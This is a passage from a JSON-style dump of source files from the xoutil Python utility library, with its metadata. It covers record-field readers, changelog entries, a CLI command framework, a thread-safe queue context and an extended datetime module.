types.\n\n You could use either the classmethod `get_field`:func: to get the value of\n field in a single line (data as provided by the external source)::\n\n >>> line = (1, 'AA20X138874Z012')\n >>> INVOICE.get_field(line, INVOICE.REFERENCE)\n 'AA20X138874Z012'\n\n You may also have an instance::\n\n >>> invoice = INVOICE(line)\n >>> invoice.reference\n 'AA20X138874Z012'\n\n .. note:: Instances attributes are renamed to lowercase. 
So you **must**\n not create any other attribute that has the same name as a field in\n lowercase, or else it will be overwritten.\n\n You could define `readers` for any field. For instance if you have a\n \"CREATED_DATETIME\" field you may create a \"_created_datetime_reader\"\n function that will be used to parse the raw value of the instance into an\n expected type. See the `included readers builders below\n <included-readers>`:ref:.\n\n Readers are always cast as `staticmethods`, whether or not you have\n explicitly stated that fact::\n\n >>> from dateutil import parser\n >>> class BETTER_INVOICE(INVOICE):\n ... CREATED_TIME = 2\n ... _created_time_reader = lambda val: parser.parse(val)\n\n >>> line = (1, 'AA20X138874Z012', '2014-02-17T17:29:21.965053')\n >>> BETTER_INVOICE.get_field(line, BETTER_INVOICE.CREATED_TIME)\n datetime.datetime(2014, 2, 17, 17, 29, 21, 965053)\n\n .. warning:: Creating readers for fields defined in super classes is not\n directly supported. To do so, you **must** declare the reader as a\n staticmethod yourself.\n\n .. note:: Currently there's no concept of relationship between rows in\n this model. We are evaluating whether by placing a some sort of\n context into the `kwargs` argument would be possible to write readers\n that fetch other instances.\n\n \"\"\"\n\n def __init__(self, raw_data):\n self._raw_data = raw_data\n\n def __repr__(self):\n cls = type(self)\n return \"%s(%r)\" % (cls.__name__, self._raw_data)\n\n def __getitem__(self, field_index):\n return type(self).get_field(self._raw_data, field_index)\n\n\ndef isnull(val):\n \"\"\"Return True if `val` is null.\n\n Null values are None, the empty string and any False instance of\n `xotl.tools.symbols.boolean`:class:.\n\n Notice that 0, the empty list and other false values in Python are not\n considered null. 
This allows that the CSV null (the empty string) is\n correctly treated while other sources that provide numbers (and 0 is a\n valid number) are not misinterpreted as null.\n\n \"\"\"\n from xotl.tools.symbols import boolean\n\n return val in (None, \"\") or (isinstance(val, boolean) and not val)\n\n\n# Standard readers\ndef check_nullable(val, nullable):\n \"\"\"Check the restriction of nullable.\n\n Return True if the val is non-null. If nullable is True and the val is\n null returns False. If `nullable` is False and `val` is null, raise a\n ValueError.\n\n Test for null is done with function `isnull`:func:.\n\n \"\"\"\n null = isnull(val)\n if not null or nullable:\n return not null\n else:\n raise ValueError(\"NULL value was not expected here\")\n\n\n@lru_cache()\ndef datetime_reader(format, nullable=False, default=None, strict=True):\n \"\"\"Returns a datetime reader.\n\n :param format: The format the datetime is expected to be in the external\n data. This is passed to `datetime.datetime.strptime`:func:.\n\n :param strict: Whether to be strict about datetime format.\n\n The reader works first by passing the value to strict\n `datetime.datetime.strptime`:func: function. If that fails with a\n ValueError and strict is True the reader fails entirely.\n\n If strict is False, the worker applies different rules. First if the\n `dateutil` package is installed its parser module is tried. If `dateutil`\n is not available and nullable is True, return None; if nullable is False\n and default is not null (as in `isnull`:func:), return `default`,\n otherwise raise a ValueError.\n\n .. versionadded: 1.6.7 Add the `strict` argument.\n\n .. 
versionchanged: 1.6.7.1 Keep the meaning of null when testing for\n `default` if strict is False and dateutil is not available.\n\n \"\"\"\n try:\n from dateutil.parser import parse\n except ImportError:\n parse = None\n\n def reader(val):\n if check_nullable(val, nullable):\n from datetime import datetime\n\n try:\n return datetime.strptime(val, format)\n except ValueError:\n if strict:\n raise\n elif parse:\n return parse(val)\n else:\n if nullable:\n return None\n elif not isnull(default):\n return default\n else:\n raise ValueError\n else:\n return default\n\n return reader\n\n\n@lru_cache()\ndef date_reader(format, nullable=False, default=None, strict=True):\n \"\"\"Return a date reader.\n\n This is similar to `datetime_reader`:func: but instead of returning a\n `datetime.datetime`:class: it returns a `datetime.date`.\n\n Actually this function delegates to `datetime_reader`:func: most of its\n functionality.\n\n .. versionadded: 1.6.8\n\n \"\"\"\n reader = datetime_reader(format, nullable=nullable, default=default, strict=strict)\n\n def res(val):\n result = reader(val)\n if not isnull(result) and result is not default:\n return result.date()\n else:\n return result\n\n return res\n\n\n@lru_cache()\ndef boolean_reader(true=(\"1\",), nullable=False, default=None):\n \"\"\"Returns a boolean reader.\n\n :param true: A collection of raw values considered to be True. 
Only the\n values in this collection will be considered True values.\n\n \"\"\"\n\n def reader(val):\n if check_nullable(val, nullable):\n return val in true\n else:\n return default\n\n return reader\n\n\n@lru_cache()\ndef integer_reader(nullable=False, default=None):\n \"\"\"Returns an integer reader.\"\"\"\n\n def reader(val):\n if check_nullable(val, nullable):\n return int(val)\n else:\n return default\n\n return reader\n\n\n@lru_cache()\ndef decimal_reader(nullable=False, default=None):\n \"\"\"Returns a Decimal reader.\"\"\"\n\n def reader(val):\n if check_nullable(val, nullable):\n from decimal import Decimal\n\n return Decimal(val)\n else:\n return default\n\n return reader\n\n\n@lru_cache()\ndef float_reader(nullable=False, default=None):\n \"\"\"Returns a float reader.\"\"\"\n\n def reader(val):\n if check_nullable(val, nullable):\n return float(val)\n else:\n return default\n\n return reader\n\n\ndel lru_cache\n" }, { "alpha_fraction": 0.7357142567634583, "alphanum_fraction": 0.7357142567634583, "avg_line_length": 30.11111068725586, "blob_id": "78351f2cf190ddeab840955c8ad71076c1f742ff", "content_id": "53bab0f462c2d1851e04d10106f873894f9318fa", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 280, "license_type": "permissive", "max_line_length": 68, "num_lines": 9, "path": "/docs/source/history/_changes-1.6.8.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Added `xoutil.records.date_reader`:func:.\n\n- Added a forward-compatible ``xoutil.inspect.getfullargspec``.\n\n- Now `contexts <xoutil.context>`:mod: will support gevent-locals if\n available. 
See the note in `the module documentation\n <context-greenlets>`:ref:.\n\n- Minor fixes.\n" }, { "alpha_fraction": 0.6202531456947327, "alphanum_fraction": 0.6962025165557861, "avg_line_length": 78, "blob_id": "1e61ed10d2d9f3ffeb6c3d3b8da3f69ca8278dde", "content_id": "00dd9187522227ca471aa7f139783258a0fbee03", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 79, "license_type": "permissive", "max_line_length": 78, "num_lines": 1, "path": "/docs/source/history/_changes-2.0.1.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Incorporates all (applicable) changes from `release 1.9.1 <rel-1.9.1>`:ref:.\n" }, { "alpha_fraction": 0.4751381278038025, "alphanum_fraction": 0.4751381278038025, "avg_line_length": 35.20000076293945, "blob_id": "e87d89ee4426d704157dd4ff0b40fda27c124919", "content_id": "6933f66336b883e7ceaed3a86cfcb715335f435c", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 181, "license_type": "permissive", "max_line_length": 62, "num_lines": 5, "path": "/docs/source/xotl.tools/values/simple.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.values.simple`:mod: -- Simple or internal coercers\n==============================================================\n\n.. 
automodule:: xotl.tools.values.simple\n :members:\n" }, { "alpha_fraction": 0.5487886667251587, "alphanum_fraction": 0.5513683557510376, "avg_line_length": 30.505300521850586, "blob_id": "3b42f86aeda66d9a4f44569727d77acafbc0e786", "content_id": "5cc58f7ae460e6072be3f4b16321b6092c581bc0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8917, "license_type": "no_license", "max_line_length": 78, "num_lines": 283, "path": "/xotl/tools/cli/__init__.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Tools for Command-Line Interface (CLI) applications.\n\nCLI is a mean of interaction with a computer program where the user (or\nclient) issues commands to the program in the form of successive lines of text\n(command lines).\n\nCommands can be registered by:\n\n - sub-classing the `Command`:class:,\n - using `~abc.ABCMeta.register`:meth: ABC mechanism for virtual sub-classes,\n - redefining `~`Command.sub_commands`` class method.\n\n.. versionadded:: 1.4.1\n\n\"\"\"\n\nfrom abc import abstractmethod, ABCMeta, ABC\nfrom xotl.tools.objects import staticproperty\nfrom xotl.tools.cli.tools import command_name, program_name\n\n\nclass CommandMeta(ABCMeta):\n \"\"\"Meta-class for all commands.\"\"\"\n\n def __new__(meta, name, bases, namespace):\n cls = super(CommandMeta, meta).__new__(meta, name, bases, namespace)\n cls.__subcommands_registry__ = set()\n return cls\n\n def register(cls, subclass):\n \"\"\"Register a virtual subclass of a Command.\n\n Returns the sub-command, to allow usage as a class decorator.\n\n .. 
note:: Python 3.7 hides internal registry (``_abc_registry``), so\n a sub-commands registry is implemented.\n\n \"\"\"\n cls.__subcommands_registry__.add(subclass)\n res = super(CommandMeta, cls).register(subclass)\n if res is None:\n res = subclass\n return res\n\n def cli_name(cls):\n \"\"\"Calculate the command name.\n\n Standard method uses `~xotl.tools.cli.tools.hyphen_name`. Redefine it\n to obtain a different behaviour.\n\n Example::\n\n >>> class MyCommand(Command):\n ... pass\n\n >>> MyCommand.cli_name() == 'my-command'\n True\n\n \"\"\"\n from xotl.tools.cli.tools import hyphen_name\n\n unset = object()\n names = (\"command_cli_name\", \"__command_name__\")\n i, res = 0, unset\n while i < len(names) and res is unset:\n name = names[i]\n res = getattr(cls, names[i], unset)\n if res is unset:\n i += 1\n elif not isinstance(res, str):\n msg = \"Attribute '{}' must be a string.\".format(name)\n raise TypeError(msg)\n if res is unset:\n res = hyphen_name(cls.__name__)\n return res\n\n def get_setting(cls, name, *default):\n aux = len(default)\n if aux < 2:\n unset = object()\n default = default[0] if aux == 1 else unset\n res = cls.__settings__.get(name, default)\n if res is not unset:\n return res\n else:\n raise KeyError(name)\n else:\n msg = \"get_setting() takes at most 3 arguments ({} given)\"\n raise TypeError(msg.format(aux + 2))\n\n def set_setting(cls, name, value):\n cls.__settings__[name] = value # TODO: Check type\n\n def set_default_command(cls, cmd=None):\n \"\"\"Default command is called when no one is specified.\n\n A command is detected when its name appears as the first command-line\n argument.\n\n To specify a default command, use this method with the command as a\n string (the command name) or the command class.\n\n If the command is specified, then the calling class is the selected\n one.\n\n For example::\n\n >>> Command.set_default_command('server') # doctest: +SKIP\n >>> Server.set_default_command() # doctest: +SKIP\n >>> 
Command.set_default_command(Server) # doctest: +SKIP\n\n \"\"\"\n if cls is Command:\n if cmd is not None:\n name = cmd if isinstance(cmd, str) else command_name(cmd)\n else:\n # TODO: consider reset to None\n raise ValueError(\"missing command specification!\")\n else:\n if cmd is None:\n name = command_name(cls)\n else:\n raise ValueError(\"redundant command specification\", cls, cmd)\n Command.set_setting(\"default_command\", name)\n\n\nclass Command(ABC, metaclass=CommandMeta):\n \"\"\"Base for all commands.\"\"\"\n\n __settings__ = {\n # 'default_command' : None\n }\n __registry_cache__ = {}\n\n def __str__(self):\n return command_name(type(self))\n\n def __repr__(self):\n return \"<command: %s>\" % command_name(type(self))\n\n @staticproperty\n def registry():\n \"\"\"Obtain all registered commands.\"\"\"\n res = Command.__registry_cache__\n if not res:\n Command._settle_cache(Command)\n assert res.pop(command_name(Command), None) is None\n Command._check_help()\n return res\n\n @abstractmethod\n def run(self, args=None):\n '''Must return a valid value for \"sys.exit\"'''\n raise NotImplementedError\n\n @staticmethod\n def _settle_cache(source, recursed=None):\n \"\"\"Initialize '__registry_cache__'.\"\"\"\n from xotl.tools.names import nameof\n\n if recursed is None:\n recursed = set()\n name = nameof(source, inner=True, full=True)\n if name not in recursed:\n recursed.add(name)\n sub_commands = type.__subclasses__(source)\n virtuals = getattr(source, \"__subcommands_registry__\", ())\n sub_commands.extend(virtuals)\n cmds = getattr(source, \"__commands__\", None)\n if cmds:\n from collections import Iterable\n\n if not isinstance(cmds, Iterable):\n cmds = cmds()\n sub_commands.extend(cmds)\n if sub_commands:\n for cmd in sub_commands:\n Command._settle_cache(cmd, recursed=recursed)\n else: # Only branch commands are OK to execute\n from types import FunctionType as ValidMethodType\n\n assert isinstance(source.run, ValidMethodType), (\n \"Invalid type %r for 
source %r\"\n % (type(source.run).__name__, source)\n ) # noqa\n Command.__registry_cache__[command_name(source)] = source\n else:\n raise ValueError('Reused class \"%s\"!' % name)\n\n @staticmethod\n def _check_help():\n \"\"\"Check that correct help command is present.\"\"\"\n name = HELP_NAME\n hlp = Command.__registry_cache__[name]\n if hlp is not Help and not getattr(hlp, \"__overwrite__\", False):\n Command.__registry_cache__[name] = Help\n\n\nclass Help(Command):\n \"\"\"Show all commands.\n\n Define the class attribute `__order__` to sort commands in special command\n \"help\".\n\n Commands could define its help in the first line of a sequence of\n documentations until found:\n\n - command class,\n - \"run\" method,\n - definition module.\n\n This command could not be overwritten unless using the class attribute:\n\n __overwrite__ = True\n\n \"\"\"\n\n __order__ = -9999\n\n @classmethod\n def get_arg_parser(cls):\n \"\"\"This is an example on how to build local argument parser.\n\n Use class method \"get\n\n \"\"\"\n # TODO: Use 'add_subparsers' in this logic (see 'backlog.org').\n res = getattr(cls, \"_arg_parser\")\n if not res:\n from argparse import ArgumentParser\n\n res = ArgumentParser()\n cls._arg_parser = res\n return res\n\n def run(self, args=[]):\n print('The most commonly used \"%s\" commands are:' % program_name())\n cmds = Command.registry\n ordered = [(getattr(cmds[cmd], \"__order__\", 0), cmd) for cmd in cmds]\n ordered.sort()\n max_len = len(max(ordered, key=lambda x: len(x[1]))[1])\n for _, cmd in ordered:\n cmd_class = cmds[cmd]\n doc = self._strip_doc(cmd_class.__doc__)\n if not doc:\n doc = self._strip_doc(cmd_class.run.__doc__)\n if not doc:\n import sys\n\n mod_name = cmd_class.__module__\n module = sys.modules.get(mod_name, None)\n if module:\n doc = self._strip_doc(module.__doc__)\n doc = '\"%s\"' % (doc if doc else mod_name)\n else:\n doc = '\"%s\"' % mod_name\n head = \" \" * 3 + cmd + \" \" * (2 + max_len - len(cmd))\n 
print(head, doc)\n\n @staticmethod\n def _strip_doc(doc):\n if doc:\n doc = str(\"%s\" % doc).strip()\n return str(doc.split(\"\\n\")[0].strip(\"\"\"\"' \\t\\n\\r\"\"\"))\n else:\n return \"\"\n\n\nHELP_NAME = command_name(Help)\n\n# TODO: Create \"xotl.tools.config\" here\n\ndel abstractmethod, ABCMeta\ndel staticproperty\n" }, { "alpha_fraction": 0.5602241158485413, "alphanum_fraction": 0.5620915293693542, "avg_line_length": 25.774999618530273, "blob_id": "8db6717eaee5faf0eb19ddc28dd1c311d3f35d83", "content_id": "44e6a45e41e25d21dec48774ea36bc226499cc4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1072, "license_type": "no_license", "max_line_length": 72, "num_lines": 40, "path": "/xotl/tools/tasking/safe.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Python context with thread-safe queued data.\n\n\"\"\"\n\n\n# TODO: Optimize this by using standard threading locks\nclass SafeData:\n \"\"\"Python context with queued data.\"\"\"\n\n __slots__ = (\"queue\", \"timeout\", \"data\")\n\n def __init__(self, data, timeout=None):\n from queue import Queue\n\n self.queue = Queue(1)\n self.queue.put(data)\n self.timeout = timeout\n self.data = data\n\n def __enter__(self):\n res = self.queue.get(True, self.timeout)\n if res is self.data:\n return res\n else:\n raise RuntimeError(\"unexpected error, invalid queued data\")\n\n def __exit__(self, exc_type, exc_value, traceback):\n data = self.data\n self.queue.task_done()\n self.queue.put(data, True, self.timeout)\n return False\n" }, { "alpha_fraction": 0.5674050450325012, "alphanum_fraction": 0.5758445858955383, "avg_line_length": 
30.940711975097656, "blob_id": "222130b0aa80cee2a1f03a492fa86e9e96700abe", "content_id": "43f49ae8f7bfddf5f25da15fa957bcdec72c118f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 40407, "license_type": "no_license", "max_line_length": 88, "num_lines": 1265, "path": "/xotl/tools/future/datetime.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Extends the standard `datetime` module.\n\n- Python's ``datetime.strftime`` doesn't handle dates previous to 1900.\n This module define classes to override `date` and `datetime` to support the\n formatting of a date through its full proleptic Gregorian date range.\n\nBased on code submitted to comp.lang.python by Andrew Dalke, copied from\nDjango and generalized.\n\nYou may use this module as a drop-in replacement of the standard library\n`datetime` module.\n\n\"\"\"\n\nfrom datetime import * # noqa\nfrom datetime import timedelta\nimport datetime as _stdlib # noqa\n\nfrom re import compile as _regex_compile\nfrom time import strftime as _time_strftime\n\nfrom enum import IntEnum\nfrom typing import Iterator, Tuple, Union # noqa\n\nfrom xotl.tools.deprecation import deprecated\n\n\nclass WEEKDAY(IntEnum):\n \"\"\"Simple constants for 'weekday' method.\"\"\"\n\n MONDAY = 0\n TUESDAY = 1\n WEDNESDAY = 2\n THURSDAY = 3\n FRIDAY = 4\n SATURDAY = 5\n SUNDAY = 6\n\n\nclass ISOWEEKDAY(IntEnum):\n \"\"\"Simple constants for 'weekday' method.\"\"\"\n\n MONDAY = 1\n TUESDAY = 2\n WEDNESDAY = 3\n THURSDAY = 4\n FRIDAY = 5\n SATURDAY = 6\n SUNDAY = 7\n\n\n@deprecated(\"plain objects\")\ndef assure(obj):\n \"\"\"Make sure that a `date` or `datetime` instance is a 
safe version.\n\n This is only a type checker alternative to standard library.\n\n \"\"\"\n if isinstance(obj, (date, datetime, _stdlib.time, timedelta)):\n return obj\n else:\n raise TypeError(\"Not valid type for datetime assuring: %s\" % obj)\n\n\n@deprecated(assure)\ndef new_date(d):\n \"\"\"Generate a safe date from a legacy datetime date object.\"\"\"\n return date(d.year, d.month, d.day)\n\n\n@deprecated(assure)\ndef new_datetime(d):\n \"\"\"Generate a safe datetime given a legacy date or datetime object.\"\"\"\n args = [d.year, d.month, d.day]\n if isinstance(d, datetime):\n args.extend([d.hour, d.minute, d.second, d.microsecond, d.tzinfo])\n return datetime(*args)\n\n\ndel deprecated\n\n\n# This library does not support strftime's \"%s\" or \"%y\" format strings.\n# Allowed if there's an even number of \"%\"s because they are escaped.\n_illegal_formatting = _regex_compile(br\"((^|[^%])(%%)*%[sy])\")\n\n\ndef _year_find_all(fmt, year, no_year_tuple):\n text = _time_strftime(fmt, (year,) + no_year_tuple)\n regex = _regex_compile(str(year))\n return {match.start() for match in regex.finditer(text)}\n\n\n_TD_LABELS = \"dhms\" # days, hours, minutes, seconds\n\n\ndef _strfnumber(number, format_spec=\"%0.2f\"):\n \"\"\"Convert a floating point number into string using a smart way.\n\n Used internally in strfdelta.\n\n \"\"\"\n res = format_spec % number\n if \".\" in res:\n res = res.rstrip(\"0\")\n if res.endswith(\".\"):\n res = res[:-1]\n return res\n\n\ndef strfdelta(delta):\n \"\"\"\n Format a timedelta using a smart pretty algorithm.\n\n Only two levels of values will be printed.\n\n ::\n\n >>> def t(h, m):\n ... 
return timedelta(hours=h, minutes=m)\n\n >>> strfdelta(t(4, 56)) == '4h 56m'\n True\n\n \"\"\"\n ss, sss = str(\"%s%s\"), str(\" %s%s\")\n if delta.days:\n days = delta.days\n delta -= timedelta(days=days)\n hours = delta.total_seconds() / 60 / 60\n res = ss % (days, _TD_LABELS[0])\n if hours >= 0.01:\n res += sss % (_strfnumber(hours), _TD_LABELS[1])\n else:\n seconds = delta.total_seconds()\n if seconds > 60:\n minutes = seconds / 60\n if minutes > 60:\n hours = int(minutes / 60)\n minutes -= hours * 60\n res = ss % (hours, _TD_LABELS[1])\n if minutes >= 0.01:\n res += sss % (_strfnumber(minutes), _TD_LABELS[2])\n else:\n minutes = int(minutes)\n seconds -= 60 * minutes\n res = ss % (minutes, _TD_LABELS[2])\n if seconds >= 0.01:\n res += sss % (_strfnumber(seconds), _TD_LABELS[3])\n else:\n res = ss % (_strfnumber(seconds, \"%0.3f\"), _TD_LABELS[3])\n return res\n\n\ndef strftime(dt, fmt):\n \"\"\"Used as `strftime` method of `date` and `datetime` redefined classes.\n\n Also could be used with standard instances.\n\n \"\"\"\n if dt.year >= 1900:\n bases = type(dt).mro()\n i = 0\n base = _strftime = type(dt).strftime\n while _strftime == base:\n aux = getattr(bases[i], \"strftime\", base)\n if aux != base:\n _strftime = aux\n else:\n i += 1\n return _strftime(dt, fmt)\n else:\n illegal_formatting = _illegal_formatting.search(fmt)\n if illegal_formatting is None:\n year = dt.year\n # For every non-leap year century, advance by 6 years to get into\n # the 28-year repeat cycle\n delta = 2000 - year\n year += 6 * (delta // 100 + delta // 400)\n year += ((2000 - year) // 28) * 28 # Move to around the year 2000\n no_year_tuple = dt.timetuple()[1:]\n sites = _year_find_all(fmt, year, no_year_tuple)\n sites &= _year_find_all(fmt, year + 28, no_year_tuple)\n res = _time_strftime(fmt, (year,) + no_year_tuple)\n syear = \"%04d\" % dt.year\n for site in sites:\n res = res[:site] + syear + res[site + 4 :]\n return res\n else:\n msg = \"strftime of dates before 1900 does not 
handle %s\"\n raise TypeError(msg % illegal_formatting.group(0))\n\n\ndef parse_date(value=None):\n if value:\n y, m, d = value.split(\"-\")\n return date(int(y), int(m), int(d))\n else:\n return date.today()\n\n\ndef parse_datetime(value=None):\n \"\"\"Parse a datime in format 'YYYY-MM-DD HH:MM[:SS][.MS]'.\n\n The hour-minute component is mandatory.\n\n \"\"\"\n if value:\n d, t = value.split()\n y, m, d = d.split(\"-\")\n if \".\" in t:\n moment, ms = t.split(\".\")\n else:\n moment, ms = t, \"0\"\n timing = moment.split(\":\")\n if len(timing) == 2:\n h, mn = timing\n s = 0\n elif len(timing) == 3:\n h, mn, s = timing\n else:\n raise ValueError(\"Invalid time string %r\" % t)\n return datetime(int(y), int(m), int(d), int(h), int(mn), int(s), int(ms))\n else:\n return datetime.now()\n\n\ndef get_month_first(ref=None):\n \"\"\"Given a reference date, returns the first date of the same month. If\n `ref` is not given, then uses current date as the reference.\n \"\"\"\n aux = ref or date.today()\n y, m = aux.year, aux.month\n return date(y, m, 1)\n\n\ndef get_month_last(ref=None):\n \"\"\"Given a reference date, returns the last date of the same month. If\n `ref` is not given, then uses current date as the reference.\n \"\"\"\n aux = ref or date.today()\n y, m = aux.year, aux.month\n if m == 12:\n m = 1\n y += 1\n else:\n m += 1\n return date(y, m, 1) - timedelta(1)\n\n\ndef get_next_month(ref=None, lastday=False):\n \"\"\"Get the first or last day of the *next month*.\n\n If `lastday` is False return the first date of the `next month`.\n Otherwise, return the last date.\n\n The *next month* is computed with regards to a reference date. If `ref`\n is None, take the current date as the reference.\n\n Examples:\n\n >>> get_next_month(date(2017, 1, 23))\n date(2017, 2, 1)\n\n >>> get_next_month(date(2017, 1, 23), lastday=True)\n date(2017, 2, 28)\n\n .. 
versionadded:: 1.7.3\n\n \"\"\"\n result = get_month_last(ref) + timedelta(days=1)\n if lastday:\n return get_month_last(result)\n else:\n return result\n\n\ndef is_full_month(start, end):\n \"\"\"Returns true if the arguments comprises a whole month.\n \"\"\"\n sd, sm, sy = start.day, start.month, start.year\n em, ey = end.month, end.year\n return (\n (sd == 1) and (sm == em) and (sy == ey) and (em != (end + timedelta(1)).month)\n )\n\n\nclass flextime(timedelta):\n @classmethod\n def parse_simple_timeformat(cls, which):\n if \"h\" in which:\n hour, rest = which.split(\"h\")\n else:\n hour, rest = 0, which\n return int(hour), int(rest), 0\n\n def __new__(cls, *args, **kwargs):\n first = None\n if args:\n first, rest = args[0], args[1:]\n _super = super().__new__\n if first and not rest and not kwargs:\n hour, minutes, seconds = cls.parse_simple_timeformat(first)\n return _super(cls, hours=hour, minutes=minutes, seconds=seconds)\n else:\n return _super(cls, *args, **kwargs)\n\n\n# TODO: Merge this with the new time span.\ndef daterange(*args):\n \"\"\"Similar to standard 'range' function, but for date objets.\n\n Returns an iterator that yields each date in the range of ``[start,\n stop)``, not including the stop.\n\n If `start` is given, it must be a date (or `datetime`) value; and in this\n case only `stop` may be an integer meaning the numbers of days to look\n ahead (or back if `stop` is negative).\n\n If only `stop` is given, `start` will be the first day of stop's month.\n\n `step`, if given, should be a non-zero integer meaning the numbers of days\n to jump from one date to the next. It defaults to ``1``. If it's positive\n then `stop` should happen after `start`, otherwise no dates will be\n yielded. 
If it's negative `stop` should be before `start`.\n\n As with `range`, `stop` is never included in the yielded dates.\n\n \"\"\"\n import operator\n\n # Use base classes to allow broader argument values\n from datetime import date, datetime\n\n if len(args) == 1:\n start, stop, step = None, args[0], None\n elif len(args) == 2:\n start, stop = args\n step = None\n else:\n start, stop, step = args\n if not step and step is not None:\n raise ValueError(\"Invalid step value %r\" % step)\n if not start:\n if not isinstance(stop, (date, datetime)):\n raise TypeError(\"stop must a date if start is None\")\n else:\n start = get_month_first(stop)\n else:\n if stop is not None and not isinstance(stop, (date, datetime)):\n stop = start + timedelta(days=stop)\n if step is None or step > 0:\n compare = operator.lt\n else:\n compare = operator.gt\n step = timedelta(days=(step if step else 1))\n\n # Encloses the generator so that signature validation exceptions happen\n # without needing to call next().\n def _generator():\n current = start\n while stop is None or compare(current, stop):\n yield current\n current += step\n\n return _generator()\n\n\nclass DateField:\n \"\"\"A simple descriptor for dates.\n\n Ensures that assigned values must be parseable dates and parses them.\n\n \"\"\"\n\n def __init__(self, name, nullable=False):\n self.name = name\n self.nullable = nullable\n\n def __get__(self, instance, owner):\n if instance is not None:\n res = instance.__dict__[self.name]\n return res\n else:\n return self\n\n def __set__(self, instance, value):\n if value in (None, False):\n # We regard False as None, so that working with Odoo is easier:\n # missing values in Odoo, often come as False instead of None.\n if not self.nullable:\n raise ValueError(\"Setting None to a required field\")\n else:\n value = None\n elif isinstance(value, datetime):\n value = value.date()\n elif not isinstance(value, date):\n value = parse_date(value)\n instance.__dict__[self.name] = 
value\n\n\nclass DateTimeField(object):\n \"\"\"A simple descriptor for datetimes.\n\n Ensures that assigned values must be parseable date or datetime and parses\n them.\n\n If `prefer_last_minute` is False when converting from date, the time\n component will be '00:00:00', if True, the time component will be\n '23:59:59'.\n\n .. versionadded:: 1.9.7\n\n \"\"\"\n\n def __init__(self, name, nullable=False, prefer_last_minute=False):\n self.name = name\n self.nullable = nullable\n self.prefer_last_minute = prefer_last_minute\n\n def __get__(self, instance, owner):\n if instance is not None:\n res = instance.__dict__[self.name]\n return res\n else:\n return self\n\n def __set__(self, instance, value):\n if value in (None, False):\n # We regard False as None, so that working with Odoo is easier:\n # missing values in Odoo, often come as False instead of None.\n if not self.nullable:\n raise ValueError(\"Setting None to a required field\")\n else:\n value = None\n elif isinstance(value, datetime):\n # needed because datetime is subclass of date, and the next\n # condition would match.\n pass\n elif isinstance(value, date):\n if not self.prefer_last_minute:\n value = datetime(value.year, value.month, value.day)\n else:\n value = datetime(value.year, value.month, value.day, 23, 59, 59)\n else:\n try:\n value = parse_datetime(value)\n except ValueError:\n value = parse_date(value)\n self.__set__(instance, value) # lazy me\n return\n instance.__dict__[self.name] = value\n\n\nclass TimeSpan:\n \"\"\"A *continuous* span of time.\n\n Time spans objects are iterable. They yield exactly two times: first the\n start date, and then the end date::\n\n >>> ts = TimeSpan('2017-08-01', '2017-09-01')\n >>> tuple(ts)\n (date(2017, 8, 1), date(2017, 9, 1))\n\n Time spans objects have two items::\n\n >>> ts[0]\n date(2017, 8, 1)\n\n >>> ts[1]\n date(2017, 9, 1)\n\n >>> ts[:]\n (date(2017, 8, 1), date(2017, 9, 1))\n\n Two time spans are equal if their start_date and end_date are equal. 
When\n comparing a time span with a date, the date is coerced to a time span\n (`from_date`:meth:).\n\n .. note:: Comparing time spans with date time spans `coerces the time span\n <DateTimeSpan.from_timespan>`:meth: before comparing.\n\n A time span with its `start` set to None is unbound to the past. A time\n span with its `end` set to None is unbound to the future. A time span\n that is both unbound to the past and the future contains all possible\n dates. A time span that is not unbound in any direction is\n `bound <bound>`:attr:.\n\n A bound time span is `valid`:attr: if its start date comes before its end\n date. Unbound time spans are always valid.\n\n Time spans can `intersect <__mul__>`:meth:, compared for containment of\n dates and by the subset/superset order operations (``<=``, ``>=``). In\n this regard, they represent the *set* of dates between `start` and `end`,\n inclusively.\n\n .. warning:: Time spans don't implement the union or difference operations\n expected in sets because the difference/union of two span is not\n necessarily *continuous*.\n\n \"\"\"\n\n start_date = DateField(\"start_date\", nullable=True)\n end_date = DateField(\"end_date\", nullable=True)\n\n def __init__(self, start_date=None, end_date=None):\n self.start_date = start_date\n self.end_date = end_date\n\n @classmethod\n def from_date(self, date: date) -> \"TimeSpan\":\n \"\"\"Return a new time span that covers a single `date`.\"\"\"\n return self(start_date=date, end_date=date)\n\n @property\n def past_unbound(self) -> bool:\n \"True if the time span is not bound into the past.\"\n return self.start_date is None\n\n @property\n def future_unbound(self) -> bool:\n \"True if the time span is not bound into the future.\"\n return self.end_date is None\n\n @property\n def unbound(self) -> bool:\n \"\"\"True if the time span is `unbound into the past <past_unbound>`:attr: or\n `unbount into the future <future_unbound>`:attr: or both.\n\n \"\"\"\n return self.future_unbound or 
